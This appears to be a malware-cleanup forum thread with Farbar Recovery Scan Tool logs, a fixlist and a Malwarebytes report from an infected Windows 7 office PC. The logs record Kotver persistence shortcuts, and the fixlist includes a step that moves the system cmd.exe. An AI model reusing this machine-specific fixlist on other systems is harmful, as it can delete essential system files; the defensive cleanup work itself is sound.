FirewallRules: [{D5D458D6-78D8-41E9-B965-9ACCD3323D44}] => C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{396FFEC3-E353-4DCE-9F52-20C78D68CE90}] => C:\Program Files\iTunes\iTunes.exe
FirewallRules: [TCP Query User{52AF0EF5-B842-4C97-BB7E-5B8DC02D3EA3}C:\program files (x86)\roadkil.net\commtest_1_2_winall.exe] => C:\program files (x86)\roadkil.net\commtest_1_2_winall.exe
FirewallRules: [UDP Query User{6D52537C-A62A-4A8D-AAF5-02DCDC7B910C}C:\program files (x86)\roadkil.net\commtest_1_2_winall.exe] => C:\program files (x86)\roadkil.net\commtest_1_2_winall.exe
FirewallRules: [{A4391F3D-FD04-44C9-9AD0-384F184595D4}] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Restore Points =========================

08-11-2016 15:49:23 Installed LogMeIn
08-11-2016 16:07:12 Installed LogMeIn
09-11-2016 16:53:11 Windows Update
02-12-2016 04:48:22 Scheduled Checkpoint
05-12-2016 12:04:32 Restore Operation

==================== Faulty Device Manager Devices =============

Name: Photosmart Plus B210 series
Description: Photosmart Plus B210 series
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: HP
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: Photosmart 7510 series
Description: Photosmart 7510 series
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: HP
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.
Name: HP Officejet Pro 8610
Description: HP Officejet Pro 8610
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: HP
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: HP Officejet Pro 8610
Description: HP Officejet Pro 8610
Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318}
Manufacturer: HP
Service:
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

==================== Event log errors: =========================

Application errors:
==================
Error: (12/06/2016 04:46:41 PM) (Source: Symantec AntiVirus) (EventID: 51) (User: IDS)
Description: Security Risk Found!SONAR.Kotver!gen4 in File: c:\windows\syswow64\rundll32.exe by: SONAR scan. Action: . Action Description: Access Denied

Error: (12/06/2016 04:43:38 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: EXCEL.EXE, version: 14.0.7176.5000, time stamp: 0x57fdf479
Faulting module name: EXCEL.EXE, version: 14.0.7176.5000, time stamp: 0x57fdf479
Exception code: 0xc0000005
Fault offset: 0x0019226f
Faulting process id: 0xa3c
Faulting application start time: 0x01d25008cc7a700a
Faulting application path: C:\PROGRA~2\MICROS~1\Office14\EXCEL.EXE
Faulting module path: C:\PROGRA~2\MICROS~1\Office14\EXCEL.EXE
Report Id: 0b9bdde8-bbfd-11e6-8bb4-00270e34bb77

Error: (12/06/2016 04:35:06 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (12/06/2016 04:30:59 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program Explorer.exe version 6.1.7601.23537 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
Process ID: 19f0
Start Time: 01d24fb2095acdfb
Termination Time: 60000
Application Path: C:\Windows\Explorer.exe
Report Id: 19b15be4-bbfb-11e6-8bb5-00270e34bb77

Error: (12/06/2016 04:26:59 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program EXCEL.EXE version 14.0.7176.5000 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
Process ID: 27d4
Start Time: 01d25004559b8057
Termination Time: 34332
Application Path: C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
Report Id: 9868f99d-bbfa-11e6-8bb5-00270e34bb77

Error: (12/06/2016 11:44:38 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program Acrobat.exe version 10.1.5.33 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
Process ID: 19e8
Start Time: 01d24fdfce7ba9bc
Termination Time: 60000
Application Path: C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat.exe
Report Id: 14e9b3ad-bbd3-11e6-8bb5-00270e34bb77

Error: (12/06/2016 11:37:12 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program Acrobat.exe version 10.1.5.33 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
Process ID: 2334
Start Time: 01d24fdebc3fce12
Termination Time: 76
Application Path: C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat.exe
Report Id: 2abd62c7-bbd2-11e6-8bb5-00270e34bb77

Error: (12/06/2016 08:01:22 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program OUTLOOK.EXE version 14.0.7172.5000 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
Process ID: 19d0
Start Time: 01d24fbfb71c285a
Termination Time: 9518
Application Path: C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE
Report Id: 05e67684-bbb4-11e6-8bb5-00270e34bb77

Error: (12/06/2016 07:50:30 AM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )
Description: A problem prevented Customer Experience Improvement Program data from being sent to Microsoft, (Error 80004005).

Error: (12/06/2016 05:52:41 AM) (Source: Symantec AntiVirus) (EventID: 51) (User: IDS)
Description: Security Risk Found!SONAR.Kotver!gen4 in File: c:\windows\syswow64\rundll32.exe by: SONAR scan. Action: . Action Description: Access Denied


System errors:
=============
Error: (12/07/2016 03:31:55 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.

Error: (12/07/2016 03:07:47 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (12/07/2016 03:07:23 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.

Error: (12/07/2016 02:01:49 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (12/07/2016 01:31:17 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.

Error: (12/07/2016 01:10:50 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.

Error: (12/06/2016 10:25:12 PM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.

Error: (12/06/2016 10:04:30 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.

Error: (12/06/2016 09:46:32 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.

Error: (12/06/2016 09:01:34 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.


CodeIntegrity:
===================================
Date: 2016-10-12 11:10:15.723
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2016-10-12 11:10:15.676
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2014-12-30 14:37:50.421
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.

Date: 2014-12-30 14:21:58.702
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.

Date: 2014-12-30 14:00:27.988
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.

Date: 2014-12-29 16:13:00.235
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.

Date: 2014-12-29 15:58:22.386
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.

Date: 2014-12-29 15:21:37.531
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.

Date: 2014-12-29 14:59:21.278
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.

Date: 2014-12-29 14:46:25.562
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\l3codeca.acm because the set of per-page image hashes could not be found on the system.

==================== Memory info ===========================

Processor: Intel(R) Core(TM)2 Duo CPU E8400 @ 3.00GHz
Percentage of memory in use: 60%
Total physical RAM: 4052.52 MB
Available physical RAM: 1620.38 MB
Total Virtual: 8103.22 MB
Available Virtual: 5488.07 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:465.66 GB) (Free:331.21 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: EB6F6C15)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=465.7 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================
  4. Much appreciated. God Bless You for all your assistance. You've been *very* responsive. In the future is there a way to request assistance specifically from you? We also seem to have similar work hours. ;-)
  5. All looks good. :-) Making donation now. Thank you sir!
  6. Unknown file now gone. VG! How's the rest look? Also reran MBAM as a crosscheck. Please find its report below also. Anything else to check? Continued thanks. - CT

Fix result of Farbar Recovery Scan Tool (x64) Version: 30-11-2016
Ran by cjerald (01-12-2016 06:03:05) Run:4
Running from \\SPARTA\RedirectedFolders\cjerald\Desktop
Loaded Profiles: cjerald (Available Profiles: Clayton & cjerald)
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start
CreateRestorePoint:
Startup: \\SPARTA\RedirectedFolders\cjerald\Start Menu\Programs\Startup\756f18.lnk [2016-11-23]
ShortcutTarget: 756f18.lnk -> (No File)
Startup: \\SPARTA\RedirectedFolders\cjerald\Start Menu\Programs\Startup\96da9b.lnk [2016-11-18]
ShortcutTarget: 96da9b.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
GroupPolicyScripts: Restriction <======= ATTENTION
Shortcut: C:\Users\cjerald\AppData\Local\322148\4c5510.lnk -> C:\Users\cjerald\AppData\Local\322148\83934e.bat (No File)
C:\Users\cjerald\AppData\Local\322148
Folder: C:\Users\cjerald\AppData\Local\322148
CMD: ipconfig /flushdns
EmptyTemp:
end
*****************

Restore point was successfully created.
Startup: \\SPARTA\RedirectedFolders\cjerald\Start Menu\Programs\Startup\756f18.lnk [2016-11-23] => not found.
ShortcutTarget: 756f18.lnk -> (No File) => not found.
Startup: \\SPARTA\RedirectedFolders\cjerald\Start Menu\Programs\Startup\96da9b.lnk [2016-11-18] => not found.
Could not move "C:\Windows\System32\cmd.exe" => Scheduled to move on reboot.
C:\Windows\system32\GroupPolicy\Machine => moved successfully
C:\Windows\system32\GroupPolicy\GPT.ini => moved successfully
C:\Users\cjerald\AppData\Local\322148\4c5510.lnk => moved successfully
C:\Users\cjerald\AppData\Local\322148 => moved successfully

========================= Folder: C:\Users\cjerald\AppData\Local\322148 ========================

not found.

====== End of Folder: ======

========= ipconfig /flushdns =========

Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

========= End of CMD: =========

=========== EmptyTemp: ==========

BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 18985497 B
Java, Flash, Steam htmlcache => 3285 B
Windows/system/drivers => 6295 B
Edge => 0 B
Chrome => 108856135 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 0 B
systemprofile32 => 128 B
LocalService => 0 B
NetworkService => 0 B
clayton => 0 B
cjerald => 450135245 B
Connie => 0 B
UpdatusUser => 0 B

RecycleBin => 0 B
EmptyTemp: => 551.2 MB temporary data Removed.

================================

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 12/1/2016
Scan Time: 7:29 AM
Logfile:
Administrator: Yes

Version: 2.2.1.1043
Malware Database: v2016.12.01.09
Rootkit Database: v2016.11.20.01
License: Free
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: cjerald

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 394666
Time Elapsed: 13 min, 13 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)

(end)
  7. Window on boot that says: "Windows can't open this file: File: 3e258b.08d7732 ..." Continued thanks...

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 30-11-2016
Ran by cjerald (administrator) on PC-8 (01-12-2016 04:41:49)
Running from \\SPARTA\RedirectedFolders\cjerald\Desktop
Loaded Profiles: cjerald (Available Profiles: Clayton & cjerald)
Platform: Windows 7 Professional Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: "C:\Program Files (x86)\Slimjet\slimjet.exe" -- "%1")
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
() C:\Program Files (x86)\Backblaze\bzserv.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(Intel Corporation) C:\Windows\System32\IPROSetMonitor.exe
(Intel(R) Corporation) C:\Program Files\Intel\BCA\pabeSvc64.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\ramaint.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(Pervasive Software Inc.) C:\Program Files (x86)\Pervasive Software\PSQL\bin\w3dbsmgr.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSvcHst.exe
(McAfee, Inc.) C:\Program Files\TrueKey\McAfee.TrueKey.Service.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin64\Smc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(McAfee, Inc.) C:\Program Files\TrueKey\McTkSchedulerService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Bin\ccSvcHst.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(LogMeIn, Inc.) C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe
() C:\Program Files (x86)\Backblaze\bzbui.exe
(Renesas Electronics Corporation) C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\BusinessMessaging.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Microsoft Corporation) C:\Windows\System32\mobsync.exe
(Farbar) \\SPARTA\RedirectedFolders\cjerald\Desktop\FRST64.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2585744 2015-08-18] (NVIDIA Corporation)
HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\rundll32.exe C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
HKLM\...\Run: [LogMeIn GUI] => C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe [57928 2013-11-05] (LogMeIn, Inc.)
HKLM-x32\...\Run: [NUSB3MON] => C:\Program Files (x86)\Renesas Electronics\USB 3.0 Host Controller Driver\Application\nusb3mon.exe [113288 2011-01-23] (Renesas Electronics Corporation)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2016-09-22] (Oracle Corporation)
HKLM-x32\...\Run: [Malwarebytes Anti-Malware] => C:\Program Files (x86)\Malwarebytes Anti-Malware\BusinessMessaging.exe [3219456 2016-11-01] (Malwarebytes)
Winlogon\Notify\GoToAssist: C:\Program Files (x86)\Citrix\GoToAssist Corporate\1019\G2AWinLogon_x64.dll (Citrix Online, a division of Citrix Systems, Inc.)
HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\...\Run: [Backblaze] => C:\Program Files (x86)\Backblaze\bzbui.exe [596648 2016-11-16] ()
HKU\S-1-5-18\...\Run: [Backblaze] => C:\Program Files (x86)\Backblaze\bzbui.exe [596648 2016-11-16] ()
IFEO\ehshell.exe: [Debugger] "C:\Program Files (x86)\LogMeIn\x64\LogMeInSystray.exe" -MceShellRedirect
Lsa: [Notification Packages] scecli C:\Program Files\WIDCOMM\Bluetooth Software\BtwProximityCP.dll C:\Program Files\TrueKey\McAfeeTrueKeyPasswordFilter
Startup: \\SPARTA\RedirectedFolders\cjerald\Start Menu\Programs\Startup\756f18.lnk [2016-11-23]
ShortcutTarget: 756f18.lnk -> (No File)
Startup: \\SPARTA\RedirectedFolders\cjerald\Start Menu\Programs\Startup\96da9b.lnk [2016-11-18]
ShortcutTarget: 96da9b.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
GroupPolicyScripts: Restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.0.105 192.168.0.1
Tcpip\..\Interfaces\{C095AEBB-3422-4678-BFF1-85A8F1306E8D}: [DhcpNameServer] 192.168.0.105 192.168.0.1

Internet Explorer:
==================
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-3320201264-2921037059-4171379232-1148\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://msn.com/
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Symantec Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\bin\IPS\IPSBHO.DLL [2014-10-03] (Symantec Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\ssv.dll [2016-11-16] (Oracle Corporation)
BHO-x32: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2013-09-03] (Adobe Systems Incorporated)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\jp2ssv.dll [2016-11-16] (Oracle Corporation)
BHO-x32: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2013-09-03] (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2013-09-03] (Adobe Systems Incorporated)
Toolbar: HKU\S-1-5-21-3320201264-2921037059-4171379232-1148 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - No File
DPF: HKLM-x32 {FD0B6769-6490-4A91-AA0A-B5AE0DC75AC9} hxxps://secure.logmein.com//activex/ractrl.cab?lmi=1091

FireFox:
========
FF ProfilePath: C:\Users\cjerald\AppData\Roaming\Mozilla\Firefox\Profiles\2ak3a5ce.default-1478012619453 [2016-11-21]
FF Homepage: Mozilla\Firefox\Profiles\2ak3a5ce.default-1478012619453 -> hxxp://www.msn.com/
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn
FF Extension: (Adobe Acrobat - Create PDF) - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn [2013-12-17] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{BBDA0591-3099-440a-AA10-41764D9DB4DB}] - C:\ProgramData\Symantec\Symantec Endpoint Protection\12.1.4112.4156.105\Data\IPSFFPlgn => not found
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_23_0_0_162.dll [2016-09-26] ()
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_23_0_0_162.dll [2016-09-26] ()
FF Plugin-x32: @java.com/DTPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\dtplugin\npDeployJava1.dll [2016-11-16] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\plugin2\npjp2.dll [2016-11-16] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2015-08-17] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2015-08-17] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-29] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-29] (Google Inc.)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Air\nppdf32.dll [2013-09-03] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-3320201264-2921037059-4171379232-1148: @citrixonline.com/appdetectorplugin -> C:\Users\cjerald\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2014-01-07] (Citrix Online)

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default [2016-11-30]
CHR Extension: (Google Docs) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-03-19]
CHR Extension: (Google Drive) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-06-13]
CHR Extension: (YouTube) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-06-13]
CHR Extension: (Google Search) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-04-20]
CHR Extension: (Google Docs Offline) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-06-13]
CHR Extension: (Avast Online Security) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2016-11-09]
CHR Extension: (Chrome Web Store Payments) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-06-13]
CHR Extension: (Gmail) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-04-20]
CHR Extension: (Chrome Media Router) - C:\Users\cjerald\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-11-01]

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 bzserv; C:\Program Files (x86)\Backblaze\bzserv.exe [356008 2016-11-16] ()
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1148560 2015-08-18] (NVIDIA Corporation)
S4 GoToAssist; C:\Program Files (x86)\Citrix\GoToAssist Corporate\1019\g2aservice.exe [309080 2014-07-24] (Citrix Online, a division of Citrix Systems, Inc.)
R2 IntelBCAsvc; C:\Program Files\Intel\BCA\pabeSvc64.exe [3020440 2015-11-25] (Intel(R) Corporation)
R2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe [419336 2016-10-12] (LogMeIn, Inc.)
R2 LMIMaint; C:\Program Files (x86)\LogMeIn\x64\RaMaint.exe [509448 2016-10-12] (LogMeIn, Inc.)
R2 LogMeIn; C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe [407424 2013-11-05] (LogMeIn, Inc.)
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1706128 2015-08-18] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [21833360 2015-08-18] (NVIDIA Corporation)
R2 psqlWGE; C:\Program Files (x86)\Pervasive Software\PSQL\bin\w3dbsmgr.exe [435488 2009-11-17] (Pervasive Software Inc.)
